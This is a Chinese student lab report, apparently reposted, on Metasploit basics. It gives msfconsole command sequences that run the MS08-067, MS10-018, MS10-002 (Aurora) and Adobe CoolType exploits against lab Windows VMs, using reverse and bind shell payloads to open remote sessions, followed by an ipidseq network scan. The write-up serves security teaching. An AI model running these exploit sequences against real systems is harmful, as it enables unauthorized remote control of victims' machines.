码迷,mamicode.com
首页 > 其他好文 > 详细

2020-2021-2 20181304石昊林《网络对抗技术》 Exp6 MSF应用基础

时间:2021-05-24 03:52:25      阅读:0      评论:0      收藏:0      [点我收藏+]

标签:选择   版本   收获   host   信息   最大的   ali   encode   很多   

MSF应用基础

实践目标

  • 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。

实践内容

  • 一个主动攻击实践,尽量使用最新的类似漏洞;
  • 一个针对浏览器的攻击,尽量使用最新的类似漏洞;
  • 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
  • 成功实现应用任何一个辅助模块。

实践过程

1. 主动攻击实践

  1. MS08_067(不唯一)
  • 靶机:windows 2000,ip地址为:192.168.0.111
  • 攻击机:kali,ip地址为:192.168.0.112
  • 在kali中输入msfconsole进入msf控制台:输入以下指令:
    • search ms08-067查看漏洞位置
      技术图片
    • use exploit/windows/smb/ms08_067_netapi选择对应位置的漏洞
    • set payload generic/shell_reverse_tcp设置攻击载荷:tcp反向回连
    • set LHOSTS 192.168.0.112设置攻击机IP
    • set RHOSTS 192.168.0.111设置靶机IP
    • exploit进行攻击
      技术图片

2. 针对浏览器的攻击

  1. MS10_018(不唯一)
  • 靶机:windows XP Professional,ip地址为:172.30.0.251
  • 攻击机:kali,ip地址为:172.30.1.3
  • 在kali中输入msfconsole进入msf控制台:输入以下指令:
    • search ms10_018查看漏洞位置
      技术图片
    • use exploit/windows/browser/ms10_018_ie_behaviors选择第一个漏洞
    • set payload windows/meterpreter/bind_tcp设置攻击载荷
      技术图片
    • show options显示连接需要设置的参数
    • set RHOST 172.30.0.251设置靶机IP
      技术图片
    • set target 0
    • exploit进行攻击
      技术图片
    • 在靶机浏览器中输入上述local IP,浏览器自动关闭,攻击成功。此时kali虚拟机中显示生成了会话1,如下图:
      技术图片
    • 输入sessions -i -1进入会话,可以控制靶机。
      技术图片
  1. MS10_002(唯一)
  • 靶机:windows XP Professional,ip地址为:172.30.0.251
  • 攻击机:kali,ip地址为:172.30.1.3
  • 在kali中输入msfconsole进入msf控制台:输入以下指令:
    • search ms10_002查看漏洞位置
      技术图片
    • use exploit/windows/browser/ms10_002_aurora选择第一个漏洞
    • show payload查看有效的攻击载荷(太多了,只截一部分)
      技术图片
    • set payload windows/meterpreter/bind_tcp设置攻击载荷
      技术图片
    • show options显示连接需要设置的参数,然后设置参数。
      技术图片
    • exploit进行攻击
      技术图片
    • 在靶机浏览器中输入上述local IP的地址,浏览器无响应,攻击成功。
      技术图片
    • 此时kali虚拟机中显示生成了会话1,如下图:
      技术图片
    • 输入sessions -i -1进入会话,可以控制靶机。
      技术图片

3. 针对客户端的攻击

  1. Adobe(唯一)
  • 这里不同点在于靶机通过访问loacl ip的地址,下载pdf文件并打开,从而使用攻击机攻击成功。
  • 靶机:windows 7,ip地址为:192.168.43.18
  • 攻击机:kali,ip地址为:192.168.43.28
  • 在kali中输入msfconsole进入msf控制台:输入以下指令:
    • search adobe查看漏洞位置,选择use exploit/windows/browser/adobe_cooltype_sing(注意这里不是生成一个pdf文件,而是一个下载地址,在靶机中浏览器中打开)。
      技术图片
    • set payload windows/meterpreter/reverse_tcp设置攻击载荷。
      技术图片
    • show options
      技术图片
    • set LHOST 192.168.43.28
    • set LPORT 1304
    • exploit
      技术图片
    • 在靶机浏览器中输入上述local IP的地址,浏览器打开后下载文件,使用Adobe打开,攻击机显示攻击成功。
      技术图片

4. 成功实现应用任何一个辅助模块

  1. ipidseq
  • 它的功能是扫描网段中的存活ip,它会识别被发现主机的IPID(用于跟踪IP包的次序的一种技术)序列模式,并且表示出哪些是0、随机或递增的。拥有递增的IPID的空闲(空闲是指该主机在特定时间内不向网络发送数据包)主机(即显示为Incremental!的条目),不会被网络上的其它主机严重影响,可以用来进行TCP空闲扫描。
  • TCP空闲扫描:是一种高级的nmap扫描方式,这种扫描方式能让我们冒充网络上另一台主机的IP地址对目标进行更为隐秘的扫描。
  • 靶机:windows 7,ip地址为:192.168.43.18
  • 攻击机:kali,ip地址为:192.168.43.28
  • 在kali中输入msfconsole进入msf控制台:输入以下指令:
    • use auxiliary/scanner/ip/ipidseq
      技术图片
    • set RHOSTS 192.168.1.0/24对指定网段的主机进行扫描
      技术图片
    • set TIMEOUT 5设置5秒扫不到就断开
      技术图片
    • exploit攻击
      技术图片

实践问题回答

  1. 用自己的话解释什么是exploit,payload,encode。
  • exploit就是漏洞利用,即利用系统或程序的漏洞进行攻击的过程,不过这个过程需要一些简单的设置。
  • payload就是攻击时需要设置的代码,也就是攻击者手中的武器罢了。
  • encode就是编码,可以消除一些坏字符,也可能被用作帮助其被杀软发现。
  1. 离实战还缺些什么技术或步骤?
  • 首先我觉得局限性比较大,就像一些漏洞只对应一些指定的版本。
  • 如何做到“欺骗”,即攻击浏览器,如何才能让生成的网址看起来的正确的,我觉得这里需要多思考一下。

实践遇到的问题

  1. MS11_050
  • 我在使用这个漏洞攻击浏览器时,多次尝试但是不能攻击成功,报错如下图所示:
    技术图片
  • 主要是这句话:Unknown User-Agent Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)我研究了一下,这条信息表明我使用的是浏览器是IE6,操作系统是XP,和火狐没啥关系。。。这句话的意思应该是叫我用IE浏览器浏览该网页,但我确实是用IE去访问的。我想可能是版本的问题,但是我在网上找不到之前的版本去尝试,这个漏洞到这就结束了。

实践体会

  • 这次实验要下载的东西很多,在着期间我也遇到了各种各样的问题,虚拟机也崩了好多次,我花费了大量时间和精力才能做出一部分。但是通过这次实验,我对MSF的使用方法更加了解了,这是收获最大的地方。

2020-2021-2 20181304石昊林《网络对抗技术》 Exp6 MSF应用基础

标签:选择   版本   收获   host   信息   最大的   ali   encode   很多   

原文地址:https://www.cnblogs.com/shl1304/p/14728358.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!